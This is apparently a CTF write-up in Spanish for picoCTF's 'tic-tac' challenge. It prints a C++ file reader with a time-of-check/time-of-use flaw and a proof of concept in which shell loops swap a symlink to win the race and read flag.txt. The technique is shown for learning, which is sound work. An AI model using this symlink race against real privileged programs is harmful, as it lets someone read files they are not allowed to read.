d3bo Support

tic-tac

pico
pwn
TOCTOU

August 2, 20252 minutes

#include <iostream>
#include <fstream>
#include <unistd.h>
#include <sys/stat.h>

int main(int argc, char *argv[]) {
  if (argc != 2) {
    std::cerr << "Usage: " << argv[0] << " <filename>" << std::endl;
    return 1;
  }

  std::string filename = argv[1];
  std::ifstream file(filename);
  struct stat statbuf;

  // Check the file's status information.
  if (stat(filename.c_str(), &statbuf) == -1) {
    std::cerr << "Error: Could not retrieve file information" << std::endl;
    return 1;
  }

  // Check the file's owner.
  if (statbuf.st_uid != getuid()) {
    std::cerr << "Error: you don't own this file" << std::endl;
    return 1;
  }

  // Read the contents of the file.
  if (file.is_open()) {
    std::string line;
    while (getline(file, line)) {
      std::cout << line << std::endl;
    }
  } else {
    std::cerr << "Error: Could not open file" << std::endl;
    return 1;
  }

  return 0;
}

Vuln

Hay un programa que solo lee el contenido de los archivos de los cuales el que ejecuta el programa es el propietario. La idea es crear un enlace simbólico que apunte a un archivo del cual el usuario sea propietario; así pasará la primera validación. Pero después, el usuario cambiará el enlace simbólico para que apunte a flag.txt y se muestre su contenido. Esta vulnerabilidad se llama Time-of-check Time-of-use (TOCTOU) Race Condition.

PoC

ctf-player@pico-chall$ touch random.txt
ctf-player@pico-chall$ cat link.sh
while true
do
ln -sf random.txt file.txt
ln -sf flag.txt file.txt
done
ctf-player@pico-chall$ nano execute.sh
ctf-player@pico-chall$ cat execute.sh
while true
do
./txtreader file.txt
done
ctf-player@pico-chall$ chmod +x execute.sh link.sh
ctf-player@pico-chall$ ./link.sh &
[1] 45
ctf-player@pico-chall$ ./execute.sh &
[2] 2889
ctf-player@pico-chall$ Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
Error: you don't own this file
picoCTF{******_3a5y_5748402c}
Prev
Unsubscriptions Are Free
Next
Guessing Game 2